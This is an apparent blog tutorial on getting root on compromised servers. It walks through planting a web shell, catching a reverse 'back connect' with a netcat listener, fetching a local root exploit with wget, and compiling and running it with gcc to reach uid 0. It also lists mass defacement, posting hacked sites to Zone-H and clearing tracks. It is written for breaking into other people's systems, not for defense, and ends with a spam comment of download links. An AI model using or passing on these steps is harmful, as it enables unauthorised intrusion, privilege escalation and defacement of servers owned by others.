How to ROOT on SERVER (part 1)


This small tutorial is will explain you how professional hackers got root on servers. This tut is for beginner, so lets look at some contents of
this tutorials below

1. What is Root ?
2. How can I get on the Root ?
3. Local root and how to search for him ?
4. How connect the server ?
5. How to get Root access ?
6. What happen after the root ?
7. The withdrawal of my domain ?
8. How to do mass deface ?
9. How to register the hacked websites on Zoneh?
10. How to clear tracks from serve ?

WOW!!! the contents of this tutorials look very
interesting hope you take ur time sit down and
grab this now. so lets keep the dice roolinq.

What is Root On Server ?
Root is the Administrator of all server. If someone
got root access he can do anything with server like
delete and copy anything on server ; can deface all
the home pages (massive deface ) ….

We can’t talk about root on windows. That enough
for beginner because if I talk about the root I need
another book.

So, I guess now we know the importance of root
access and why we try to got root.

Hope this was cool?

How Do I get on the Root ?

There are 3 ways to get ROOT on server :
1 – With local Root.
2 – With SQL by reading same important files on
it root password.
3 – With exploit on software (Buffer Overflow).

In this TUT , I will explain local Root. I will explain
the other ways soon in another TUT. OK, let’s back
to work.

After Uploading your shell on server and getting
the localroot you will do a back connect and run
the localroot to Get root . This is a small idea how
it work in the next lesson you will see how to
find localroot and run it to get root access.
Local root and how to search for it ?

First of all we you need to know what version of
Kernel.
1 – You can know that from your shell

For example this version is 2.6.18 – 2010
OR

2 – Go To Execute case on your shell
and write uname -a any way you will get the same result .
Now How to find local-root So go to Google for
example write “Local Root 2.6.18 – 2010”
OR Go to Security websites
like Exploit-DB.com or injector ……..

There are 2 type of local root
1 – Local.c : not ready to use.
2 – Local : ready to use.

OK, I will explain how to make local.c > local on the
next tut. so lets go over to the next item in our
content.

How to get Root access ?


First, you need a shell on it Back Connect option
like in this picture.

1 – Your IP
2 – Port
3 – leave it Perl for now
4 – Connect

So now you must receive the back connect with a
Tool named netcat u can download it from the
net. After that open your CMD if you are underwindows or terminal if you are under-Linux.

I will explain only Windows and because is the
same on Linux.

1– Press nc -vlp 433
2– Wget [the link of the local-Root.zip]
3 – unzip local-Root.zip
4 – chmod 777 local.c
5 – now to change the local-root from local.c >
local gcc local.c -o local Then you will find local.c
transformed to local
6 – chmod 777 local
7 – ./local to local root work
8 – su then see your id
uid=0(root) gid=0(root) groups=0(root)

That will be all for now the completion of this
simple tutorial will be available soon and wll be
made known wen released so always stay online
and feed yhur heads with this juicy!!!
Next PostNewer Post Previous PostOlder Post Home

1 comment:

  1. How To Root On Server (Part 1) >>>>> Download Now

    >>>>> Download Full

    How To Root On Server (Part 1) >>>>> Download LINK

    >>>>> Download Now

    How To Root On Server (Part 1) >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete